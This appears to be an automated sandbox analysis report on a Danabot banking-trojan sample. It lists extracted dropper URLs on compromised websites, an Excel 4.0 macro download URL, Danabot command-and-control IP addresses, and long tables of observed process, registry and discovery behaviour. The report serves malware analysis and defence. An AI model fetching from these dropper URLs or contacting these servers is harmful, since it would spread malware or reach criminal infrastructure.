danabot | hxxps://youtube[.]com/@boffy/

Resubmissions

31-12-2024 05:12

241231-fv24pawlhm 7

31-12-2024 04:49

241231-ffsxgaylaw 10

31-12-2024 04:46

241231-fd1jjaykby 7

31-12-2024 04:31

241231-e5vlxsxpd1 10

Analysis

max time kernel
1050s
max time network
1046s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
31-12-2024 04:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://youtube.com/@boffy/

Score

10^/10

danabot banker botnet discovery macro phishing trojan xlm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://blockchainjoblist.com/wp-admin/014080/

exe.dropper

https://womenempowermentpakistan.com/wp-admin/paba5q52/

exe.dropper

https://atnimanvilla.com/wp-content/073735/

exe.dropper

https://yeuquynhnhai.com/upload/41830/

exe.dropper

https://deepikarai.com/js/4bzs6/

Extracted

Language

xlm4.0

Source

URLs

xlm40.dropper

https://erpoweredent.at/3/zte.dll

Extracted

Family

danabot

51.178.195.151

51.222.39.81

149.255.35.125

38.68.50.179

51.77.7.204

rsa_pubkey.plain

Signatures

Danabot
Danabot is a modular banking Trojan that has been linked with other malware.
trojan banker danabot
Danabot family
danabot

Danabot x86 payload 1 IoCs

Detection of Danabot x86 payload, mapped in memory during the execution of its loader.

botnet

resource	yara_rule
behavioral1/files/0x0007000000023f77-1686.dat	family_danabot

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1104	4212	rundll32.exe	143
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1608	1716	powershell.exe	146

Blocklisted process makes network request 24 IoCs

flow	pid	Process
203	1608	powershell.exe
205	1608	powershell.exe
208	1608	powershell.exe
211	1608	powershell.exe
273	5356	rundll32.exe
274	5356	rundll32.exe
275	5356	rundll32.exe
276	5356	rundll32.exe
277	5356	rundll32.exe
281	5356	rundll32.exe
284	5356	rundll32.exe
285	5356	rundll32.exe
287	5356	rundll32.exe
288	5356	rundll32.exe
290	5356	rundll32.exe
291	5356	rundll32.exe
292	5356	rundll32.exe
293	5356	rundll32.exe
294	5356	rundll32.exe
295	5356	rundll32.exe
297	5356	rundll32.exe
298	5356	rundll32.exe
299	5356	rundll32.exe
300	5356	rundll32.exe

Suspicious Office macro 1 IoCs

Office document equipped with 4.0 macros.

macro xlm

resource	yara_rule
behavioral1/files/0x000400000001dae7-902.dat	office_xlm_macros

A potential corporate email address has been identified in the URL: httpswww.youtube.com@boffycbrd1
phishing

Loads dropped DLL 3 IoCs

pid	Process
2116	regsvr32.exe
2116	regsvr32.exe
5356	rundll32.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\B:	EXCEL.EXE
File opened (read-only)	\??\J:	EXCEL.EXE
File opened (read-only)	\??\S:	EXCEL.EXE
File opened (read-only)	\??\V:	EXCEL.EXE
File opened (read-only)	\??\X:	EXCEL.EXE
File opened (read-only)	\??\Y:	EXCEL.EXE
File opened (read-only)	\??\Z:	EXCEL.EXE
File opened (read-only)	\??\G:	EXCEL.EXE
File opened (read-only)	\??\H:	EXCEL.EXE
File opened (read-only)	\??\I:	EXCEL.EXE
File opened (read-only)	\??\T:	EXCEL.EXE
File opened (read-only)	\??\W:	EXCEL.EXE
File opened (read-only)	\??\R:	EXCEL.EXE
File opened (read-only)	\??\U:	EXCEL.EXE
File opened (read-only)	\??\A:	EXCEL.EXE
File opened (read-only)	\??\L:	EXCEL.EXE
File opened (read-only)	\??\N:	EXCEL.EXE
File opened (read-only)	\??\O:	EXCEL.EXE
File opened (read-only)	\??\P:	EXCEL.EXE
File opened (read-only)	\??\E:	EXCEL.EXE
File opened (read-only)	\??\K:	EXCEL.EXE
File opened (read-only)	\??\M:	EXCEL.EXE
File opened (read-only)	\??\Q:	EXCEL.EXE

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Program crash 5 IoCs

pid	pid_target	Process	procid_target
6088	5864	WerFault.exe	161
5312	3756	WerFault.exe	169
2468	1892	WerFault.exe	173
5760	2760	WerFault.exe	184
2084	5700	WerFault.exe	187

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YouAreAnIdiot.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YouAreAnIdiot.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Popup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Vista.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Popup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DanaBot.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DanaBot.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WindowsUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Avoid.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DanaBot.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Popup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202020202	Popup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\NodeSlot = "16"	Popup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	EXCEL.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000	Popup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000000000001000000ffffffff	Popup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\MRUListEx = ffffffff	Popup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlgLegacy\{B3690E58-E961-423B-B687-386EBFD83239}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000050000001800000030f125b7ef471a10a5f102608c9eebac0a000000a0000000b474dbf787420341afbaf1b13dcd75cf64000000a000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000e0859ff2f94f6810ab9108002b27b3d90500000058000000	Popup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlgLegacy\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:PID = "0"	Popup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\MRUListEx = 00000000ffffffff	EXCEL.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0\0\0 = 90003100000000009f596d24100054454d50315f7e312e5a49500000740009000400efbe9f596d249f596d242e00000019070000000003000000000000000000000000000000089ff700540065006d00700031005f005400680065002d004d0041004c0057004100520045002d005200650070006f002d006d00610073007400650072002e007a006900700000001c000000	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlgLegacy\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByDirection = "1"	Popup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	Popup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202020202020202	Popup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlgLegacy\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1092616257"	Popup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\MRUListEx = 00000000ffffffff	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\SniffedFolderType = "Generic"	Popup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0\0 = 4e003100000000009f596d24100054656d7000003a0009000400efbe475917499f596d242e0000007de101000000010000000000000000000000000000006e2cb600540065006d007000000014000000	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0\0\0\0\0	EXCEL.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0\0\0\0\0\MRUListEx = ffffffff	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 00000000ffffffff	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0\0\0\0	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2	Popup.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16	Popup.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlgLegacy	Popup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	EXCEL.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0\0\0\0\0 = 68003100000000009f596d24100042414e4b494e7e310000500009000400efbe9f596d249f596d242e000000330700000000060000000000000000000000000000000e2a2200420061006e006b0069006e0067002d004d0061006c007700610072006500000018000000	EXCEL.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	EXCEL.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0\0\MRUListEx = 00000000ffffffff	EXCEL.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0\0\0\0 = 78003100000000009f596d2410005448452d4d417e310000600009000400efbe9f596d249f596d242e00000031070000000006000000000000000000000000000000089ff7005400680065002d004d0041004c0057004100520045002d005200650070006f002d006d0061007300740065007200000018000000	EXCEL.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0\0\0\0\MRUListEx = 00000000ffffffff	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Popup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff	Popup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0 = 56003100000000004759174912004170704461746100400009000400efbe475917499f5905242e00000069e10100000001000000000000000000000000000000fec635004100700070004400610074006100000016000000	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0\0\0	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlgLegacy\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1"	Popup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0 = 50003100000000004759984e100041646d696e003c0009000400efbe475917499f5905242e0000005ee101000000010000000000000000000000000000002630a200410064006d0069006e00000014000000	EXCEL.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0\0\0\MRUListEx = 00000000ffffffff	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0\0\0\0\0\NodeSlot = "6"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	EXCEL.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlgLegacy\{B3690E58-E961-423B-B687-386EBFD83239}\GroupView = "0"	Popup.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 = 7800310000000000475917491100557365727300640009000400efbe874f77489f5905242e000000c70500000000010000000000000000003a0000000000b0b3410055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Documents"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Popup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlgLegacy\{B3690E58-E961-423B-B687-386EBFD83239}\LogicalViewMode = "3"	Popup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	Popup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\SniffedFolderType = "Pictures"	Popup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlgLegacy\{B3690E58-E961-423B-B687-386EBFD83239}\Mode = "1"	Popup.exe

Suspicious behavior: AddClipboardFormatListener 3 IoCs

pid	Process
4212	EXCEL.EXE
2760	WINWORD.EXE
2760	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
2312	msedge.exe
2312	msedge.exe
1216	msedge.exe
1216	msedge.exe
1768	identity_helper.exe
1768	identity_helper.exe
2060	msedge.exe
2060	msedge.exe
1700	msedge.exe
1700	msedge.exe
1700	msedge.exe
1700	msedge.exe
1608	powershell.exe
1608	powershell.exe
1608	powershell.exe
2816	WindowsUpdate.exe
2816	WindowsUpdate.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3384	Popup.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

pid	Process
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: 33	4416	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4416	AUDIODG.EXE
Token: SeDebugPrivilege	1608	powershell.exe
Token: 33	3136	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3136	AUDIODG.EXE

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe

Suspicious use of SendNotifyMessage 29 IoCs

pid	Process
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
2816	WindowsUpdate.exe
2816	WindowsUpdate.exe
2816	WindowsUpdate.exe
2816	WindowsUpdate.exe
2816	WindowsUpdate.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
5592	OpenWith.exe
4212	EXCEL.EXE
4212	EXCEL.EXE
4212	EXCEL.EXE
4212	EXCEL.EXE
4212	EXCEL.EXE
4212	EXCEL.EXE
4212	EXCEL.EXE
4212	EXCEL.EXE
4212	EXCEL.EXE
4212	EXCEL.EXE
4212	EXCEL.EXE
4212	EXCEL.EXE
4212	EXCEL.EXE
4212	EXCEL.EXE
4212	EXCEL.EXE
2760	WINWORD.EXE
2760	WINWORD.EXE
2760	WINWORD.EXE
2760	WINWORD.EXE
2760	WINWORD.EXE
2760	WINWORD.EXE
2760	WINWORD.EXE
2760	WINWORD.EXE
2760	WINWORD.EXE
2760	WINWORD.EXE
2760	WINWORD.EXE
2760	WINWORD.EXE
2760	WINWORD.EXE
2760	WINWORD.EXE
2760	WINWORD.EXE
2760	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1216 wrote to memory of 1984	1216	msedge.exe	85
PID 1216 wrote to memory of 1984	1216	msedge.exe	85
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
